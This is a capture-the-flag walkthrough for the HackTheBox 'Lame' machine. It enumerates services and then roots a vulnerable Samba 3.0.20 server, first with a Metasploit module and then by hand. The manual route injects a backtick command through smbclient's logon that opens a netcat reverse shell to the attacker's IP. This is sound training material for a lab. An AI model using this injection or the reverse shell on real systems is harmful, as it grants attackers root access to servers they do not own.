HackTheBox Lame Writeup
Enjoy reading my HTB Lame Writeup
HackTheBox Lame Walkthrough
HackTheBox is a popular service that offers CTF-like machines to let infosec professionals improve their current skills or learn new ones. HTB Lame is a machine recommended if you want to take the OSCP exam.
This walkthrough contains two different ways of rooting the machine, one with the help of the Metasploit-framework, the other one without.
Information Gathering
First, let's begin with a nmap scan:
sudo nmap -p 1-5000 -sC -sV -v 10.10.10.3
This gives us the following information:
- Port 21: vsFTPd 2.3.4
- Port 22: OpenSSH
- Port 139 and 445: Samba smbd 3.X-4.X
- Port 3632: distccd v1
Let's enumerate the Samba shares using smbmap
:
smbmap -H 10.10.10.3
Gives us the following output:
0[+] IP: 10.10.10.3:445 Name: 10.10.10.3
1 Disk Permissions Comment
2 ---- ----------- -------
3 print$ NO ACCESS Printer Drivers
4 tmp READ, WRITE oh noes!
5 opt NO ACCESS
6 IPC$ NO ACCESS IPC Service (lame server (Samba 3.0.20-Debian))
7 ADMIN$ NO ACCESS IPC Service (lame server (Samba 3.0.20-Debian))
We can acess the tmp
share using smbclient:
smbclient \\\\10.10.10.3\\tmp
but the files on the share do not seem to be interesting or useful.
Next, let's try to enumerate FTP using the anonymous account:
0└──╼ $ftp 10.10.10.3
1Connected to 10.10.10.3.
2220 (vsFTPd 2.3.4)
3Name (10.10.10.3:user): Anonymous
4331 Please specify the password.
5Password:
6230 Login successful.
7Remote system type is UNIX.
8Using binary mode to transfer files.
9ftp> ls
10200 PORT command successful. Consider using PASV.
11150 Here comes the directory listing.
12226 Directory send OK.
13ftp> passive
14Passive mode on.
15ftp> ls
16227 Entering Passive Mode (10,10,10,3,60,72).
17150 Here comes the directory listing.
18226 Directory send OK.
19ftp> pwd
20257 "/"
21ftp>
But there is no interesting information as well.
Pwning the machine using metasploit
First, start metasploit using msfconsole
.
Now you can search for an exploit that matches the running version of samba:
search Samba 3.0.20
now either use
use 0
or use exploit/multi/samba/usermap_script
to load the exploit.
Configure the options:
set RHOSTS 10.10.10.3
set LHOST 10.10.14.4
and start the attack with run
.
You will get a reverse shell with root privileges.
Now you can read the root flag in /root/
.
To locate the user flag you can use find / -name user.txt -type f 2>/dev/null
.
Pwn without metasploit
To gain root access without the help of metasploit connect to the tmp
share using smbclient.
Then start a netcat listener (nc -lvnp 4545
) and then abuse the logon
command of smbclient to exploit the machine.
For my exploit, I took a piece of code from this ruby script.
To be more specific this was my final looking exploit for HackTheBox Lame:
0/=`nohup nc -e /bin/bash 10.10.14.4 4545 `"
Which i used together with the logon command:
0logon /=`nohup nc -e /bin/bash 10.10.14.4 4545 `"
This spawned a shell with root privileges.
The root flag is located in /root
and the user flag can be found with find / -name user.txt -type f 2>/dev/null
.
Tags:
htb, lame, hackthebox, samba